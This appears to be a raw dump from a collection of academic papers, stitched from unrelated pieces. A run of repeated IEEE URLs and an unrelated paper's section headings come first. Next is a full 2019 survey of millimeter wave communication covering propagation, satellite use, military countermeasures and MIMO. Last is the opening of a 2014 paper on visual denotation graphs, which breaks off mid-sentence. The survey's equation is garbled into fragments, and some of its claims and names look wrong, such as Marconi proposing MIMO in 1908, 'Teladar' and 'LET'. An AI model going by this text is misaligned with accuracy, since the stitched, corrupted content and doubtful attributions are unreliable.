http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6280217&url=http%3A%2F%2Fieeexplore.ieee.org%2Fxpls%2Fabs_all.jsp%3Farnumber%3D6280217 http://dx.doi.org/10.1109/TELFOR.2011.6143503 http://dx.doi.org/10.7717/peerj-cs.29 A framework for cut-over management Introduction Project-Specific Cut-over Versus Release-Specific Rollout Recommended Deliverables and Outcomes for the Preparation of a Project-Specific Cut-over Project-planning phase Design phase Realization phase Test phase Cut-over and support phase Recommended Deliverables and Outcomes for the Preparation of a Release-Specific Rollout The Rollout Handbook Communication during release planning Rollout change Lessons-learned workshop Conclusions Acknowledgements References work_wt6msc2u5rfk7duy5hzvqoldtu ---- Paper Title (use style: paper title) DOI: 10.21307/ijanmc-2019-061 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 73 Research and Development of Millimeter Wave Technology Bai Junying College of InformationEngineering North China University of Science andTechnology Tangshan, 063000, China e-mail: 15100586578@163.com An Yongli* College of InformationEngineering North China University of Science andTechnology Tangshan, Heibei, 063009, China e-mail: tongxinayl@126.com Abstract—This paper introduces the concept of millimeter wave, analyzes the advantages and disadvantages and propagation characteristics of millimeter wave, and expounds the research status of millimeter wave ground communication and millimeter wave satellite communication. The military application of millimeter wave communication technology in electronic countermeasures is taken as an example. Finally, the outlook for millimeter wave communication technology will open up new application fields in the future and have broad development prospects. Keywords-Millimeter Wave; Millimeter Wave Propagation I. INTRODUCTION With the rapid development of mobile communications, satellite communications, and on- board electronics, there is an increasing shortage of spectrum resources. However, users continue to put forward higher requirements on the speed, throughput and distance in wireless mobile communication, and the capacity requirements of the system are also getting higher and higher. Due to the extremely rich spectrum resources in the high-frequency microwave band, modern communication systems are developing towards high-frequency microwaves, especially in the millimeter-wave band. Millimeter wave communication has many unique features compared with traditional radio short wave, ultrashort wave and microwave communication. Since the millimeter wave is made up of microwaves and light waves (its wavelength is between the microwave and the light wave), it has some advantages of microwave and light waves. The communication device is small in size, and can be used with a small-sized antenna to obtain high directivity, which facilitates concealment and confidentiality of communication. The extremely high attenuation rate of millimeter waves propagating in wireless space is the biggest obstacle faced by millimeter wave systems in outdoor wireless communication applications. Fortunately, the millimeter wave has a small wavelength, allowing a large number of antennas to be installed without increasing the volume of the existing communication device, and the resulting large-scale antenna array can provide high beamforming gain, thereby obtaining sufficient link balance. the amount[1]. At present, Bell Labs USA has achieved significant capacity improvement and related efficiency improvements by using large-scale MIMO technology (multi-input and multi-output technology) in the millimeter wave band. With prototypes with peak transmission rates in excess of 50 Gbps, Bell Labs has successfully achieved spectral efficiencies of up to 100 bps / Hz in the 28 GHz millimeter-wave band, and its transfer rate allows users to download faster using the network, enabling only A few hundred megabytes of data transfer is reached in a few seconds. The realization of millimeter wave communication technology has provided a new development direction for future research on the realization of touchable Internet, low latency virtual reality and future applications such as 3D. II. MILLIMETER WAVE CHARACTERISTICS Compared with light waves, millimeter waves use the atmospheric window (millimeter waves and submillimeter waves propagate in the atmosphere, the attenuation due to the absorption of gas molecules is a small frequency, the attenuation is small), the attenuation is small, by natural light and The influence of the heat radiation source is small. A. Advantages 1) Extremely wide bandwidth. The millimeter wave frequency range is generally considered to be 26.5 to 300 GHz, and the bandwidth is as high as 273.5 GHz. More than 10 times the total bandwidth from DC to microwave. Even considering atmospheric absorption, only four main windows can be used for propagation in the atmosphere, but the total bandwidth of the four International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 74 windows is also up to 135 GHz, which is five times the sum of the bandwidths of the bands below the microwave. This is undoubtedly very attractive today when the frequency resources are tight. 2) The beam is narrow. The millimeter wave beam is much narrower than the microwave beam at the same antenna size. For example, a 12cm antenna has a beamwidth of 18 degrees at 9.4 GHz and a beamwidth of only 1.8 degrees at 94 GHz. It is therefore possible to distinguish small targets that are closer together or to see the details of the target more clearly. 3) Compared with lasers, the propagation of millimeter waves is much less affected by the climate and can be considered to have all-weather characteristics. 4) Millimeter wave components are much smaller in size than microwaves. Therefore, the millimeter wave system is easier to miniaturize. B. Disadvantages 1) The attenuation in the atmosphere is severely attenuated. 2) The processing precision of the device is high. III. MILLIMETER WAVE TRANSMISSION CHARACTERISTICS Usually the millimeter wave band refers to 30 GHz to 300 GHz, and the corresponding wavelength is 1 mm to 10 mm. Millimeter wave communication refers to communication in which millimeter waves are used as a carrier for transmitting information. At present, most of the applied research focuses on several "atmospheric window" frequencies and three "attenuation peaks" frequencies[2][3]. A. Is a typical line of sight transmission The millimeter wave belongs to the very high frequency band, and it propagates in space in the form of direct waves. The beam is narrow and has good directivity. On the one hand, since the millimeter wave is seriously affected by atmospheric absorption and rainfall fading, the single-hop communication distance is short; on the other hand, since the frequency band is high and the interference source is small, the propagation is stable and reliable. Therefore, millimeter wave communication is a typical communication technology with a high quality, constant parameter wireless transmission channel. B. Has "atmospheric window" and "attenuation peak" “Atmospheric window” refers to the 35 GHz, 45 GHz, 94 GHz, 140 GHz, and 220 GHz bands where millimeter wave propagation is less attenuated near these special frequency bands. In general, the “Atmospheric Window” band is more suitable for point-to-point communication and has been adopted by low-altitude air-to-ground missiles and ground-based radars. The attenuation near the 60 GHz, 120 GHz, and 180 GHz bands has a maximum value of about 15 dB / km or more, which is called the "attenuation peak". Often these "attenuation peak" bands are preferred by multi-channel concealed networks and systems to meet the network safety factor requirements. C. The attenuation is severe during rainfall Compared with microwaves, millimeter-wave signals are much more attenuated under harsh climatic conditions, especially during rainfall, which seriously affects the propagation effect. The conclusion of the study is that the attenuation of the millimeter wave signal during rainfall is closely related to the instantaneous intensity of the rainfall, the length of the distance and the shape of the raindrop. Further verification shows that: Generally, the greater the instantaneous intensity of rainfall, the farther the distance, and the larger the raindrops, the more severe the attenuation. Therefore, the most effective way to deal with rainfall attenuation is to leave enough level attenuation margin when designing a millimeter-wave communication system or communication line. D. Strong penetration of dust and smoke Atmospheric lasers and infrared light have poor penetrating power for dust and smoke, and millimeter waves have a clear advantage at this point. A large number of field tests have shown that millimeter waves have a strong penetrating power for dust and smoke, and can pass sand and smoke almost without attenuation. Even under the conditions of higher intensity scattering caused by explosions and metal foil strips, even if fading occurs, it is short-lived and will recover quickly. As the ions diffuse and fall, they do not cause severe disruption of millimeter wave communication. IV. RESEARCH STATUS OF MILLIMETER WAVE COMMUNICATION Current millimeter wave communication systems mainly include point-to-point communication on the earth and communication or broadcasting systems via satellite. Point-to-point millimeter-wave communications on Earth are now commonly used in relay communications where privacy is critical. The millimeter wave itself has strong concealment and anti- interference. At the same time, due to the attenuation of the millimeter wave in the atmosphere and the use of International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 75 a small-diameter antenna, a very narrow beam and a small side lobes can be obtained, so the interception of millimeter wave communication is obtained. And interference becomes very difficult[4]. A. Millimeter wave ground communication The traditional application of millimeter wave terrestrial communication systems is relay (relay) communication. Numerous tests of millimeter wave propagation have shown that multi-hop millimeter wave relay (relay) communication is feasible. In order to reduce the risk, we start with the low end of the millimeter wave band and the high end of the centimeter wave band. At the same time as the development of high-band and large-capacity communication systems, medium- and low-capacity short-range millimeter-wave communication devices in higher frequency bands have also been introduced. In the 1990s, the wave of global informationization was ushered in. With the rapid development of the Internet, the rapid growth of interactive multimedia services, broadband video services, and private network and radio communication, there is an urgent need to improve transmission rate, transmission bandwidth, and transmission quality. The demand for broadband access has become increasingly strong, and the development of various broadband access networks and devices has been promoted. Wireless broadband access technologies using millimeter waves have emerged[5]. B. Millimeter wave satellite communication Due to the abundant frequency resources, millimeter wave communication has been rapidly developed in satellite communication. For example, in the interstellar communication, the 5mm (60GHz) band is generally used because the atmospheric loss is extremely large at this frequency, and the ground cannot detect the interstellar communication content. In the interstellar, because the atmosphere is extremely thin, it will not cause the signal to decline. The US "tactical, strategic, and relay satellite systems" is an example. The system consists of five satellites with an upstream frequency of 44 GHz, a downstream frequency of 20 GHz, a bandwidth of 2 GHz, and an interstellar communication frequency of 60 GHz. Compared with other communication methods, the main advantages of satellite communication are: a) the communication distance is long, and the cost of establishing the station is independent of the communication distance. b) Working in a broadcast mode to facilitate multiple access. c) The communication capacity is large, and there are many types of services that can be transmitted. d) can be spontaneous, self-receiving, monitoring, etc. In the 1970s and 1980s, satellite communications were mostly carried out using geostationary orbits (also known as synchronous orbits). After the 1990s, satellite communication systems using medium and low orbits came to the fore. However, in the case of large-capacity communication services, satellite communication systems using geostationary orbit are still the protagonists. According to statistics, in the 10 years of the 1990s, as many as 200 communication satellites were launched into the synchronous orbit, with the C-band being the most and the Ku-band being the second. The resulting spectrum congestion of satellite communications has also become increasingly prominent, and the move to higher frequency bands has become an inevitable trend. In fact, experimental research on millimeter-wave satellite communications began in the early 1970s. Most of the development work in this area is carried out in the United States, the former Soviet Union and Japan. In the late 1980s and 1990s, in addition to the introduction of the experimental satellites in the millimeter-wave band that continued to be used in a wider range and more content, the practical Ka-band satellite communication system began to appear. It should be noted that many of these satellites use a range of advanced technologies, including multi-beam antennas, on-board switching, on-board processing, and high-speed transmission. V. MILLIMETER WAVE APPLICATION Military needs are an important factor in promoting the development of millimeter-wave systems. At present, millimeter waves have been widely used in radar, guidance, tactical and strategic communication, electronic countermeasures, remote sensing, and radiation measurement. Among them, strategic communication and electronic countermeasures are very important application directions. Electronic confrontation refers to the electromagnetic struggle between both hostile parties using electronic equipment or equipment, and is an important means in modern warfare. With the development of millimeter-wave radars and guidance systems, corresponding electronic countermeasures have also developed. In addition to strong firepower and high density in modern warfare, an important feature is that the entire battle is carried out in intense electronic confrontation. Therefore, communication equipment is required to have strong anti-interference ability, and millimeter wave shows a International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 76 clear advantage in this respect. For example, the selection of ship-to-ship millimeter-wave communications in the three "attenuation peak" bands of 60 GHz, 120 GHz, and 200 GHz, using the characteristics of severe attenuation of signals in these bands, can greatly improve the anti-jamming and anti- jamming of ship-to-ship communication. Interception ability. In foreign countries, the development of electronic countermeasure devices such as direction finding machines, jammers and signal analyzers in the millimeter wave band has been vigorously carried out. The millimeter wave beam is very narrow, and the side lobes of the antenna can be made very low, making reconnaissance and active interference more difficult. Therefore, passive interference has a great development in the millimeter band. For millimeter waves below 35 GHz, the most common means of interference is to place non-resonant millimeter-wave chaffs and aerosols to scatter the enemy millimeter- wave radar beam, which can interfere with a wider frequency band without having to accurately measure the enemy radar in advance. Frequency of. In addition, it is also possible to generate plasma by explosion, thermal ionization or radioactive elements to absorb and scatter millimeter waves to interfere with enemy radar. The frequency coverage of most radar reconnaissance and warning systems in service has been extended to 0.5 GHz to 40 GHz. According to reports, part of the radar reconnaissance equipment in the US electronic countermeasures equipment can reach 110 GHz and is developing to 300 GHz. The frequency of radar warning equipment has been extended to 40 GHz to 60 GHz. NATO is developing a vehicle-mounted millimeter-wave warning device with a frequency range of 40 GHz to 140 GHz. In addition, the communication reconnaissance band covers the 10 GHz millimeter band, and the communication interference portion below 40 GHz has been put into practical use and is developing to 110 GHz. Stealth technology can also be utilized in the millimeter band. When dealing with an active millimeter wave radar, as in the microwave band, it is possible to reduce the shape of the radar cross section or apply a millimeter wave absorbing material such as ferrite to the surface to reduce the intensity of the reflected wave. For a passive radar that tracks the target by detecting the contrast between the low millimeter wave radiation of the metal target and the background radiation, a target with a strong millimeter wave radiation is applied to make the radiation and background radiation substantially equal. Thereby merging the target into the background. In short, millimeter-wave communication is very necessary and significant for military applications. It is a promising communication means with narrow beam, high data rate, concealed radio waves, good confidentiality and anti-interference performance, and rapid opening. Easy to use and flexible, and working around the clock. In addition to its application in the field of electronic countermeasures, the application of military millimeter wave communication includes far (outer space) near (atmosphere) distance communication, rapid emergency communication, submarine communication, satellite communication, interstellar communication, and the way down the microwave trunk line. Cable breaks the device, etc. [6] VI. RELATED TECHNOLOGY RESEARCH A. Millimeter wave multi-antenna system Marconi proposed in 1908 to use MIMO technology for anti-channel fading. In the 1990s, AT&T (American Telephone & Telegraph Company) made a lot of groundbreaking work on the application of MIMO technology to communication systems. In 1995, Teladar derived the system capacity of MIMO under fading channels in the laboratory. In 1996, Foschini developed an algorithm for preprocessing signals in the MIMO channel—D-BLAST (Diagonal- BLAST) algorithm. In 1998, Wolinansky et al. used the V-BLAST (Vertical-BLAST) algorithm in the laboratory to build a MIMO system and obtained a spectrum utilization rate of 20 bps/Hz. This experiment caused great sensation in the communication industry and played a huge role in promoting the development of MIMO technology. However, as LET enters the commercial age, the demand for communication has increased year by year, and the performance of current MIMO systems cannot meet the demand for communication. Therefore, the Massive MIMO system has been proposed in recent years. Massive MIMO systems can make full use of space resources, greatly improve spectrum efficiency and power efficiency, and their system performance is greatly improved compared with MIMO systems. Massive MIMO was first developed by Thomas L. of Bell Labs, USA. Researchers such as Marzetta suggested. Thomas L. Researchers such as Marzetta found that when the number of base station antennas tends to infinity, channel effects such as additive white Gaussian noise and Rayleigh fading are negligible, greatly increasing the data transmission rate. Massive MIMO has hundreds of antennas and even thousands International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 77 of antennas at the base end, which is 1-2 orders of magnitude higher than the number of base station antennas in the existing LTE-A, thus providing a higher transmission rate. The main consideration is the typical Massive MIMO system, which assumes that there is an antenna at the base station and serves a single antenna user (and receives signals). The downlink system block diagram is shown in Figure 1. The received signal can be expressed as Equation 1-1: nxHWy p  2/1  (1) Among them,  is the downlink transmission power, K N H C   is the downlink channel matrix, (0,1)CN obeys the distribution, N K W C   is the downlink precoding matrix, 1 ( , , ) k p diag p p  is the power allocated by the base station to each user, 1K x C   is the signal vector before precoding, 1K n C   is additive Gaussian white noise. Figure 1. Block diagram of the downlink system of the millimeter wave multi-antenna system B. Interference alignment Interference alignment technology is an emerging method of interference management. When multiple users perform wireless communication, there will be interference between each other, and the interference will affect the signal reception quality and reduce the channel capacity of the receiver. Existing techniques for handling interference, such as frequency division multiplexing (FDMA), time division multiplexing (TDMA), and code division multiplexing (CDMA), primarily eliminate the effects of interfering signals on desired signals by orthogonalizing the signals. In fact, when multiple users share spectrum resources, this processing method can only allocate spectrum resources among K users. For example, when the number of users interacting with each other is K, the spectrum resource that each user can obtain is 1/K of a single user. Therefore, when the number of users is large, the spectrum resources available to each user are still very limited. The interference alignment technique was proposed to solve this problem. In 2008, the system description was first given by Professor Syed A. Jafar and his student Viveck R. Cadambe. The core idea is to jointly design the transmitter precoding matrix to divide the signal space into two parts: the desired signal space and the interference signal space. The precoding technique is used to make the interference overlap at the receiving end, thereby compressing the signal capacity occupied by the interference and eliminating interference. The effect on the desired signal is achieved for the purpose of increasing the channel capacity. Taking the implementation of spatial interference alignment as an example, the core idea of interference alignment is to limit the interference signal to a range of stator space at the receiving end. After decoding the received interference suppression matrix, the subspace where the desired signal is located and the interference signal are located. The subspaces are just orthogonal, so the desired signal is not affected by the interfering signal. In the spatial interference alignment algorithm, the transmission precoding matrix and the reception interference suppression matrix are designed according to information such as the obtained channel matrix. VII. PROSPECT Millimeter wave communication technology is a typical dual-use technology. In the military field, it can be applied to inter-satellite communication or relay, secret communication in the millimeter wave band, and millimeter wave enemy and foe identification system; in the civilian field, it can be applied to broadband multimedia mobile communication systems, measurement radar, vehicle and ship collision avoidance, topographic mapping. , radio astronomy, interactive large-capacity television broadcasting and satellite millimeter wave link system and many other aspects, and will further expand its market. In short, a large amount of research work has been carried out in the field of domestic and foreign millimeter wave communication, covering everything from basic communication theory to practical system application, which fully demonstrates that millimeter wave communication is a promising wireless communication technology. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 78 ACKNOWLEDGMENT National key research and development plan project (2017YFE0135700) Hebei Provincial Department of Education Science and Technology Project (QN2017114) Hebei Provincial Natural Science Foundation (A2015209040) North China University of Technology Doctoral Research Start-up Grant Project. REFERENCES [1] Meng Qingqi. Application and Development of Millimeter Wave Communication[J]. Microwave and Satellite Communications, 1996, (02): 20-23. [2] Li Yanli. Research Status and Development of Millimeter Wave Communication Technology [A]. Sichuan Communication Society. Proceedings of 2010 Annual Conference of Sichuan Communication Society [C]. Sichuan Communication Society:, 2010: 4. [3] Wang Xiaohai. Development and Application of Millimeter Wave Communication Technology [J]. Telecom Express, 2007, (10): 19-21. [4] Zou Weixia, Du Guanglong, Li Bin et al. A new beam search algorithm in 60GHz millimeter wave communication. Journal of Electronics and Information, 2012 [5] Zhang Wei, Li Bin, Liu Yun, Zhao Chenglin. Research on uplink hybrid beamforming technology in 60 GHz millimeter wave communication. Journal of Electronics and Information, 2012 [6] Wu Zhengde. Development of China's millimeter wave technology. Journal of University of Electronic Science and Technology of China, 1991 (6) work_wysobjngavdtdivi2qo2jkd6fi ---- From image descriptions to visual denotations: New similarity metrics for semantic inference over event descriptions From image descriptions to visual denotations: New similarity metrics for semantic inference over event descriptions Peter Young Alice Lai Micah Hodosh Julia Hockenmaier Department of Computer Science University of Illinois at Urbana-Champaign {pyoung2, aylai2, mhodosh2, juliahmr}@illinois.edu Abstract We propose to use the visual denotations of linguistic expressions (i.e. the set of images they describe) to define novel denotational similarity metrics, which we show to be at least as beneficial as distributional similarities for two tasks that require semantic inference. To compute these denotational similarities, we construct a denotation graph, i.e. a subsump- tion hierarchy over constituents and their de- notations, based on a large corpus of 30K im- ages and 150K descriptive captions. 1 Introduction The ability to draw inferences from text is a prereq- uisite for language understanding. These inferences are what makes it possible for even brief descrip- tions of everyday scenes to evoke rich mental im- ages. For example, we would expect an image of people shopping in a supermarket to depict aisles of produce or other goods, and we would expect most of these people to be customers who are either standing or walking around. But such inferences require a great deal of commonsense world knowl- edge. Standard distributional approaches to lexical similarity (Section 2.1) are very effective at iden- tifying which words are related to the same topic, and can provide useful features for systems that per- form semantic inferences (Mirkin et al., 2009), but are not suited to capture precise entailments between complex expressions. In this paper, we propose a novel approach for the automatic acquisition of de- notational similarities between descriptions of ev- eryday situations (Section 2). We define the (visual) denotation of a linguistic expression as the set of im- ages it describes. We create a corpus of images of everyday activities (each paired with multiple cap- tions; Section 3) to construct a large scale visual de- notation graph which associates image descriptions with their denotations (Section 4). The algorithm that constructs the denotation graph uses purely syn- tactic and lexical rules to produce simpler captions (which have a larger denotation). But since each image is originally associated with several captions, the graph can also capture similarities between syn- tactically and lexically unrelated descriptions. We apply these similarities to two different tasks (Sec- tions 6 and 7): an approximate entailment recogni- tion task for our domain, where the goal is to decide whether the hypothesis (a brief image caption) refers to the same image as the premises (four longer cap- tions), and the recently introduced Semantic Textual Similarity task (Agirre et al., 2012), which can be viewed as a graded (rather than binary) version of paraphrase detection. Both tasks require semantic inference, and our results indicate that denotational similarities are at least as effective as standard ap- proaches to similarity. Our code and data set, as well as the denotation graph itself and the lexical similarities we define over it are available for re- search purposes at http://nlp.cs.illinois.edu/ Denotation.html. 2 Towards Denotational Similarities 2.1 Distributional Similarities The distributional hypothesis posits that linguistic expressions that appear in similar contexts have a 67 Transactions of the Association for Computational Linguistics, 2 (2014) 67–78. Action Editor: Lillian Lee. Submitted 6/2013; Revised 10/2013; Published 2/2014. c©2014 Association for Computational Linguistics. Gray haired man in black suit and yellow tie working in a financial environment. A graying man in a suit is perplexed at a business meeting. A businessman in a yellow tie gives a frustrated look. A man in a yellow tie is rubbing the back of his neck. A man with a yellow tie looks concerned. A butcher cutting an animal to sell. A green-shirted man with a butcher’s apron uses a knife to carve out the hanging carcass of a cow. A man at work, butchering a cow. A man in a green t-shirt and long tan apron hacks apart the carcass of a cow while another man hoses away the blood. Two men work in a butcher shop; one cuts the meat from a butchered cow, while the other hoses the floor. Figure 1: Two images from our data set and their five captions similar meaning (Harris, 1954). This has led to the definition of vector-based distributional similarities, which represent each word w as a vector w derived from counts of w’s co-occurrence with other words. These vectors can be used directly to compute the lexical similarities of words, either via the cosine of the angle between them, or via other, more com- plex metrics (Lin, 1998). More recently, asymmetric similarities have been proposed as more suitable for semantic inference tasks such as entailment (Weeds and Weir, 2003; Szpektor and Dagan, 2008; Clarke, 2009; Kotlerman et al., 2010). Distributional word vectors can also be used to define the compositional similarity of longer strings (Mitchell and Lapata, 2010). To compute the similarity of two strings, the lexical vectors of the words in each string are first combined into a single vector (e.g. by element-wise addition or multiplication), and then an appropriate vector similarity (e.g. cosine) is applied to the re- sulting pair of vectors. 2.2 Visual Denotations Our approach is inspired by truth-conditional se- mantic theories in which the denotation of a declar- ative sentence is assumed to be the set of all situa- tions or possible worlds in which the sentence is true (Montague, 1974; Dowty et al., 1981; Barwise and Perry, 1980). Restricting our attention to visually descriptive sentences, i.e. non-negative, episodic (Carlson, 2005) sentences that can be used to de- scribe an image (Figure 1), we propose to instantiate the abstract notions of possible worlds or situations with concrete sets of images. The interpretation function J·K maps sentences to their visual denota- tions JsK, which is the set of images i ∈ Us ⊆ U in a ‘universe’ of images U that s describes: JsK = {i ∈ U | s is a truthful description of i} (1) Similarly, we map nouns and noun phrases to the set of images that depict the objects they describe, and verbs and verb phrases to the set of images that depict the events they describe. 2.3 Denotation Graphs Denotations induce a partial ordering over descrip- tions: if s (e.g. “a poodle runs on the beach”) en- tails a description s′ (e.g. “a dog runs”), its denota- tion is a subset of the denotation of s′ (JsK ⊆ Js′K), and we say that s′ subsumes the more specific s (s′ v s). In our domain of descriptive sentences, we can obtain more generic descriptions by simple syntactic and lexical operations ω ∈ O ⊂ S × S that preserve upward entailment, so that if ω(s) = s′, JsK ⊆ Js′K. We consider three types of oper- ations: the removal of optional material (e.g PPs like on the beach), the extraction of simpler con- stituents (NPs, VPs, or simple Ss), and lexical sub- stitutions of nouns by their hypernyms (poodle → dog). These operations are akin to the atomic ed- its of MacCartney and Manning (2008)’s NatLog system, and allow us to construct large subsump- tion hierarchies over image descriptions, which we call denotation graphs. Given a set of (upward entailment-preserving) operations O ⊂ S × S, the denotation graph DG = 〈E,V 〉 of a set of images I and a set of strings S represents a subsumption hier- archy in which each node V = 〈s, JsK〉 corresponds to a string s ∈ S and its denotation JsK ⊆ I. Di- rected edges e = (s,s′) ∈ E ⊆ V × V indicate a subsumption relation s v s′ between a more generic expression s and its child s′. An edge from s to s′ 68 exists if there is an operation ω ∈ O that reduces the string s′ to s (i.e. ω(s′) = s) and its inverse ω−1 expands the string s to s′ (i.e. ω−1(s) = s′). 2.4 Denotational Similarities Given a denotation graph over N images, we esti- mate the denotational probability of an expression s with a denotation of size |JsK| as PJK(s) = |JsK|/N, and the joint probability of two expressions analo- gously as PJK(s,s ′) = |JsK ∩ Js′K|/N. The condi- tional probability PJK(s | s′) indicates how likely s is to be true when s′ holds, and yields a simple directed denotational similarity. The (normalized) pointwise mutual information (PMI) (Church and Hanks, 1990) defines a symmetric similarity: nPMI JK(s,s ′) = log ( PJK(s,s′) PJK(s)PJK(s′) ) − log(PJK(s,s′)) We set PJK(s|s) = nPMI JK(s,s) = 1, and, if s or s′ are not in the denotation graph, nPMI JK(s,s′) = PJK(s,s ′) = 0. 3 Our Data Set Our data set (Figure 1) consists of 31,783 pho- tographs of everyday activities, events and scenes (all harvested from Flickr) and 158,915 captions (obtained via crowdsourcing). It contains and ex- tends Hodosh et al. (2013)’s corpus of 8,092 im- ages. We followed Hodosh et al. (2013)’s approach to collect images. We also use their annotation guidelines, and use similar quality controls to cor- rect spelling mistakes, eliminate ungrammatical or non-descriptive sentences. Almost all of the im- ages that we add to those collected by Hodosh et al. (2013) have been made available under a Cre- ative Commons license. Each image is described in- dependently by five annotators who are not familiar with the specific entities and circumstances depicted in them, resulting in captions such as “Three people setting up a tent”, rather than the kind of captions people provide for their own images (“Our trip to the Olympic Peninsula”). Moreover, different an- notators use different levels of specificity, from de- scribing the overall situation (performing a musical piece) to specific actions (bowing on a violin). This variety of descriptions associated with the same im- age is what allows us to induce denotational similari- ties between expressions that are not trivially related by syntactic rewrite rules. 4 Constructing the Denotation Graph The construction of the denotation graph consists of the following steps: preprocessing and linguistic analysis of the captions, identification of applicable transformations, and generation of the graph itself. Preprocessing and Linguistic Analysis We use the Linux spell checker, the OpenNLP tok- enizer, POS tagger and chunker (http://opennlp. apache.org), and the Malt parser (Nivre et al., 2006) to analyze the captions. Since the vocabulary of our corpus differs significantly from the data these tools are trained on, we resort to a number of heuris- tics to improve the analyses they provide. Since some heuristics require us to identify different entity types, we developed a lexicon of the most common entity types in our domain (people, clothing, bodily appearance (e.g. hair or body parts), containers of liquids, food items and vehicles). After spell-checking, we normalize certain words and compounds with several spelling variations, e.g. barbecue (barbeque, BBQ), gray (grey), waterski (water ski), brown-haired (brown haired), and to- kenize the captions using the OpenNLP tokenizer. The OpenNLP POS tagger makes a number of sys- tematic errors on our corpus (e.g. mistagging main verbs as nouns). Since these errors are highly sys- tematic, we are able to correct them automatically by applying deterministic rules (e.g. climbs is never a noun in our corpus, stand is a noun if it is pre- ceded by vegetable but a verb when preceded by a noun that refers to people). These fixes apply to 27,784 (17% of the 158,915 image captions). Next, we use the OpenNLP chunker to create a shallow parse. Fixing its (systematic) errors affects 28,587 captions. We then analyze the structure of each NP chunk to identify heads, determiners and pre- nominal modifiers. The head may include more than a single token if WordNet (or our hypernym lexi- con, described below) contains a corresponding en- try (e.g. little girl). Determiners include phrases such as a couple or a few. Although we use the Malt parser (Nivre et al., 2006) to identify subject- verb-object dependencies, we have found it more ac- curate to develop deterministic heuristics and lexi- 69 cal rules to identify the boundaries of complex (e.g. conjoined) NPs, allowing us to treat “a man with red 